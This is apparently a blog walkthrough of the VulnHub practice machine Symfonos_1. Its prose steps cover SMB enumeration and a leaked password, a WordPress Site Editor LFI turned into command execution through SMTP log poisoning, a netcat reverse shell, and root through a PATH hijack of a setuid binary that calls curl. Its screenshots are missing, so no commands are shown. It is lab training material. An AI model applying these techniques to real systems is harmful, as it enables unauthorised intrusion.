Thursday, February 10, 2022

Symfonos_1

 SYMFONOS_1

- Layout for this exercise:










1 - INTRODUCTION

 - The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_1, from the VulnHub pentesting platform.

Symfonos_1 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-1,322/

- Once the virtual machine downloaded and extracted with VirtualBox:



2 - ENUMERATION

- Discovering IP 192.168.1.35 with netdiscover:






- Scanning ports with Nmap:





- Enumerating with enum4linux:




- So there is one user named helios and two shared folders named helios and anonymous.

- Accessing to anonymous and getting file attention.txt:




- Reading attention.txt we discover 3 potential passwords:





- The 2nd password qwerty allows access for user helios to shared folder helios, where there are two files research.txt and todo.txt:





 
- Reading research.txt and todo.txt, we will focus our attention on folder /h3l105:




- Browsing the web server:






- Going to /h3l105 we find a Wordpress site:






- Scanning the site with Wpscan we find a folder /uploads:









- Going to /uploads there is siteeditor:




3 - EXPLOITATION

- Site Editor 1.1.1 is a Wordpress plugin vulnerable to a LFI exploit:









- Copying as URL the Proof of Concept we check that Symfonos1 is vulnerable to LFI:








- Now, let's try to include a PHP command through the STMP server:





- Adapting the exploit's Proof of Concept to command pwd:








- Same thing with command id:








- Finally let's try to execute a Netcat reverse shell:





- Setting a listener session:





- Passing the exploit to the URL and running it:





- As a consequence a remote shell is triggered:





- Improving the shell and changing to user helios' home folder:












4 - PRIVILEGE ESCALATION

- Looking for files with bit Setuid:





- Exploring /opt/statuscheck:





- Applying command strings to /opt/statuscheck:




- So it happens that /opt/statuscheck runs curl directly, with no path. 

- The idea to Privilege Escalation would be to redo curl as a bash script, store it at /tmp, and change the variable PATH so that curl is run directly from /tmp.

- The original path for curl:








- Going to /tmp and creating a new curl:




- Editing PATH by including /tmp to the beginning:






- Now /opt/statuscheck calls curl inside /tmp and a root shell is achieved:





5 - CAPTURING THE FLAG

- Reading proof.txt:











at